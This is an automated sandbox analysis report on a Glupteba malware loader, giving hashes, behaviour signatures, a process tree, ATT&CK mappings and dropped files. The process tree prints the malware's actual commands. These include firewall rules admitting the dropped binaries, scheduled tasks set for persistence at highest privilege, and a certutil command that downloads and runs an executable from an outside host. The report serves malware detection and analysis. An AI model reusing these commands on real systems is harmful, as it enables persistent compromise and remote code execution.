Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 13:52

General

  • Target

    1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8.exe

  • Size

    3.8MB

  • MD5

    8fb84447f0e6d3f9bee0e4c187cd88a7

  • SHA1

    802e1300a0563b1b87e079e0ae90266ec69b5591

  • SHA256

    1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8

  • SHA512

    66853b67011967fbd05d2f96e3ca94ac467be113673e18cbcfda91e853dc19b10ef05436cca69a997d725b254bbd9e086fc1ff09ba76fadc3dee9e52144bd8eb

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8.exe
    "C:\Users\Admin\AppData\Local\Temp\1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4684
    • C:\Users\Admin\AppData\Local\Temp\1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8.exe
      "C:\Users\Admin\AppData\Local\Temp\1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:3476
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4672
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:2320
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:956
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:1616
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:1608
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2584
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:4936
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1908

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        8fb84447f0e6d3f9bee0e4c187cd88a7

        SHA1

        802e1300a0563b1b87e079e0ae90266ec69b5591

        SHA256

        1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8

        SHA512

        66853b67011967fbd05d2f96e3ca94ac467be113673e18cbcfda91e853dc19b10ef05436cca69a997d725b254bbd9e086fc1ff09ba76fadc3dee9e52144bd8eb

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        8fb84447f0e6d3f9bee0e4c187cd88a7

        SHA1

        802e1300a0563b1b87e079e0ae90266ec69b5591

        SHA256

        1269399667ab00025edf1869d1b9c08c314c6bff346b710cedf29bfc87d3d9e8

        SHA512

        66853b67011967fbd05d2f96e3ca94ac467be113673e18cbcfda91e853dc19b10ef05436cca69a997d725b254bbd9e086fc1ff09ba76fadc3dee9e52144bd8eb

      • memory/956-145-0x0000000002B00000-0x0000000002EA6000-memory.dmp
        Filesize

        3.6MB

      • memory/956-140-0x0000000000000000-mapping.dmp
      • memory/956-148-0x0000000000400000-0x0000000000B10000-memory.dmp
        Filesize

        7.1MB

      • memory/1100-135-0x0000000000400000-0x0000000000B10000-memory.dmp
        Filesize

        7.1MB

      • memory/1100-134-0x000000000278F000-0x0000000002B35000-memory.dmp
        Filesize

        3.6MB

      • memory/1100-133-0x0000000000000000-mapping.dmp
      • memory/1116-136-0x0000000000000000-mapping.dmp
      • memory/1608-144-0x0000000000000000-mapping.dmp
      • memory/1616-143-0x0000000000000000-mapping.dmp
      • memory/2320-139-0x0000000000000000-mapping.dmp
      • memory/2584-146-0x0000000000000000-mapping.dmp
      • memory/3476-137-0x0000000000000000-mapping.dmp
      • memory/4672-138-0x0000000000000000-mapping.dmp
      • memory/4684-130-0x00000000028E2000-0x0000000002C88000-memory.dmp
        Filesize

        3.6MB

      • memory/4684-131-0x0000000002C90000-0x0000000003385000-memory.dmp
        Filesize

        7.0MB

      • memory/4684-132-0x0000000000400000-0x0000000000B10000-memory.dmp
        Filesize

        7.1MB

      • memory/4936-149-0x0000000000000000-mapping.dmp